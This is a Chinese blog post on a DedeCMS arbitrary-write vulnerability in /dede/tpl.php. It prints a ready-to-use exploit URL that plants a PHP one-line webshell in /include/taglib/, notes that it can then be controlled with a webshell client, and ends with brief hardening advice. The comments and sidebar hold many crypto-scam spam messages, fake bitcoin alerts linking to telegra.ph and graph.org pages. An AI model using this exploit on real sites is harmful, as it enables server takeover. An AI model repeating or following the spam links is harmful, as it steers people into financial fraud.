织梦CMS最新任意写入漏洞 - 小灰博客

织梦CMS最新任意写入漏洞

文章来源：小灰博客| 时间：2018-07-30 16:32:20| 作者：Leo　| 8 条评论

文章分类：IT技术分享、PHP、安全技术标签： dedecms、Leo、PHP

今天服务器提示有webshell文件，上去看下确实是被写入了一句话木马。顺藤摸瓜发现织梦/dede/tpl.php竟然存在任意写入漏洞，也不知道这个漏洞有多久了，是否被公开，既然发现了就记录下把，具体是利用tpl.php的文件管理功能，对标签的一个写入漏洞。exp是这样的

1	www.xxx.com/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?php%20$s=create_function(%27%27,$_REQUEST[x]);$s();?%3E&filename=leo.lib.php

访问确定后会在/include/taglib/目录下面生成一个叫leo.lib.php的文件。这个文件里面是一句话木马，就是url里写的PHP代码，如图

(图丢了，自己领悟)

具体想写什么在url里带入就行，接下来上菜刀，链接即可。需要注意一点，生成的文件名必须是 xxx.lib.php

具体防护方法修改后台路径肯定是必不可少的，当然现在曝下织梦路径也不是什么难事，首先可以关闭/include/taglib/下的写入权限，其次其实很多网站根本用不着文件管理器，建议直接把tpl.php文件删除或者重命名。

如果该文章帮到了您，不妨帮忙分享支持下博主！
同时也欢迎各位技术爱好者加入IT技术群（点击即可）：70035098　互相交流学习！

分享该文章到：

8 条评论

Email; Process 1,93296 bitcoin. GET => https://yandex.com/poll/enter/E34y9iSdaRJD7QXHZ9jb9R?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2025 年 6 月 20 日下午 9:24

o9143x

回复
Message: Operation 1,579770 bitcoin. Withdraw => https://graph.org/Official-donates-from-Binance-04-01?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2025 年 4 月 12 日下午 11:14

f5w4y0

回复
Notification: Transaction №TN98. ASSURE =>> https://telegra.ph/Binance-Support-02-18?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2025 年 3 月 13 日下午 1:22

5jevqs

回复
You have received a notification № 252423. Read >>> https://telegra.ph/Get-BTC-right-now-01-22?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2025 年 1 月 22 日下午 9:04

z91sjl

回复
You have 1 message(-s) № 618. Go > https://telegra.ph/Message--2868-12-25?hs=8b618b6f3e2558ea545b01f25c66ea45&说道：

2024 年 12 月 26 日上午 2:02

crsdu6

回复
今日头条说道：

2019 年 10 月 28 日下午 11:44

文章不错支持一下吧

回复
头条说道：

2019 年 1 月 24 日下午 11:37

文章不错非常喜欢

回复
骨骼尚美说道：

2018 年 12 月 9 日下午 10:59

不错的文章,学习了

回复

发表回复取消回复

分类

Android (4)
ASP (4)
HTML (29)
IOS (8)
IT技术分享 (161)
Javascript (21)
MYSQL (12)
Photoshop (1)
PHP (71)
SEO (4)
Windows (17)
其他 (34)
安全技术 (19)
小技巧 (47)
小灰闲谈 (11)
心情随写 (10)
程序囧事 (44)

IT技术分享

最新评论

❗ ALERT: You received 3.0 bitcoin! Tap to receive > https://graph.org/RECEIVE-BTC-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:1zyzyj
⚠️ ATTENTION - You got 0.75 BTC! Go to accept >> https://graph.org/RECEIVE-BTC-07-23?hs=bd1bee0195aa89b0aefb93f6c2d7018e&:nts7dt
ALERT: You got 0.75 bitcoin! Go to claim → https://graph.org/RECEIVE-BTC-07-23?hs=20bcd57ec809274e19061c909e168662&:siqqpx
⚠️ WARNING - You received 3.0 bitcoin! Go to claim → https://graph.org/RECEIVE-BTC-07-23?hs=d9564a149cf7ebbc725fcfce1bd3d512&:znwd1k
WARNING - You received 3.0 BTC! Tap to claim >> https://graph.org/RECEIVE-BTC-07-23?hs=78ee8b109ef1383fa4708aeb263ae5fb&:bwwf6q
Account Update - 0.8 Bitcoin pending. Complete reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:8d2k3q
Wallet Update: 1.1 Bitcoin detected. Secure reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=ed01c6ff34c4c03bef232f081436351d&:khhi76
Wallet Alert: 1.1 BTC pending. Secure reception => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=7512ee157075b7eeb1085dde75977f00&:s98h7m
Account Update: 0.33 BTC credited. Finalize reception > https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=82b659c095cace05cbef312726b6e1d9&:nvswei
Wallet Notification: 0.8 BTC pending. Secure reception > https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=d9564a149cf7ebbc725fcfce1bd3d512&:dajazp
Wallet Update - 0.33 Bitcoin credited. Complete transfer => https://graph.org/ACCESS-CRYPTO-REWARDS-07-23?hs=2ae440781044702fe525e5a4bc609633&:pjv6ww
ALERT: You got 0.75 bitcoin! Tap to claim → https://graph.org/RECEIVE-BTC-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:wmec98
❗ ALERT: You got 3.0 BTC! Go to receive >> https://graph.org/RECEIVE-BTC-07-23?hs=281dba697024abd3d1c5d7176ade2d86&:03bbv7
WARNING - You received 0.75 BTC! Tap to receive > https://graph.org/RECEIVE-BTC-07-23?hs=82b659c095cace05cbef312726b6e1d9&:r4r9ao
⚠️ ATTENTION - You received 3.0 BTC! Click to receive → https://graph.org/RECEIVE-BTC-07-23?hs=d9564a149cf7ebbc725fcfce1bd3d512&:cdu1wo
⚠️ ATTENTION: You received 3.0 BTC! Go to claim → https://graph.org/RECEIVE-BTC-07-23?hs=ca0101c3d55bddd4fc83ad439009f81a&:kn09t3
SECURITY UPDATE - Suspicious transfer of 1.5 BTC. Cancel? >> https://graph.org/COLLECT-BTC-07-23?hs=9e710a17c6f1893b8975843ad65a53ec&:upxwyz
ACCOUNT NOTICE: Suspicious transfer of 0.9 Bitcoin. Cancel? >> https://graph.org/COLLECT-BTC-07-23?hs=fe6091958be4c38fa81e31741d9ee97b&:4pf2ee
ACCOUNT ALERT - Unauthorized transaction of 2.0 Bitcoin. Block? >> https://graph.org/COLLECT-BTC-07-23?hs=16de53a4a2394494df77c8bcee6cad77&:h5il57
WALLET UPDATE: Suspicious transfer of 2.0 BTC. Stop? > https://graph.org/COLLECT-BTC-07-23?hs=3f08de96112b4bab631df916e9c95f9e&:puykif

链接表